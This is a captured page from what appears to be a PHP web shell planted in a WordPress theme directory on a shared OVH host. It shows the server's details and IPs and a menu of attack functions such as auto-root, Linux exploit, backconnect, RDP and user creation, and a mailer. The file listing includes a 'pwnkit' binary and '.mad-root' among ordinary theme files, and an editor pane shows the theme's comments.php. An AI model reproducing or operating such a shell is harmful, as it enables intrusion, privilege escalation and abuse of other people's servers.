Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
blue-taste /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
331
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.98
KB
-rw-r--r--
comments.php
1.49
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
dd_ie.js
568
B
-rw-r--r--
footer.php
563
B
-rw-r--r--
functions.php
1.46
KB
-rw-r--r--
functionsbak.php
995
B
-rw-r--r--
header.php
1.89
KB
-rw-r--r--
index.php
2.18
KB
-rw-r--r--
license.txt
15.05
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
47.83
KB
-rw-r--r--
search.php
1.62
KB
-rw-r--r--
searchform.php
377
B
-rw-r--r--
sidebar.php
812
B
-rw-r--r--
style.css
13.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /* * Blue Taste Wordpress Theme By Jabox (http://www.jabox.com.ar) */ ?> <?php if ('comments.php' == basename($_SERVER['SCRIPT_FILENAME'])) die ('Please do not load this page directly. Thanks!'); if (!empty($post->post_password)) { // if there's a password if ($_COOKIE['wp-postpass_' . COOKIEHASH] != $post->post_password) { // and it doesn't match the cookie ?> <p>This post is password protected. Enter the password to view comments.</p> <?php return; } } ?> <?php $options = array( 'walker' => null, 'max_depth' => '', 'style' => 'ol', 'callback' => null, 'end-callback' => null, 'type' => 'all', 'page' => '', 'per_page' => '', 'avatar_size' => 50, 'reverse_top_level' => true, 'reverse_children' => ''); ?> <?php if ( have_comments() ) : ?> <div class="separator"></div> <h3><?php comments_number('No Comments', 'One Comment', '% Comments' );?> to “<?php the_title(); ?>”</h3> <ol class="commentlist"> <?php wp_list_comments($options); ?> </ol> <div class="separator"></div> <?php paginate_comments_links(); ?> <div class="separator"></div> <?php endif; ?> <?php $options = array( 'title_reply' => __( 'Leave your Comment' ), 'title_reply_to' => __( 'Leave a Reply to %s' ), 'cancel_reply_link' => __( 'Cancel reply' ), 'label_submit' => __( 'Submit' ), ); comment_form($options,$post->ID); ?>
Close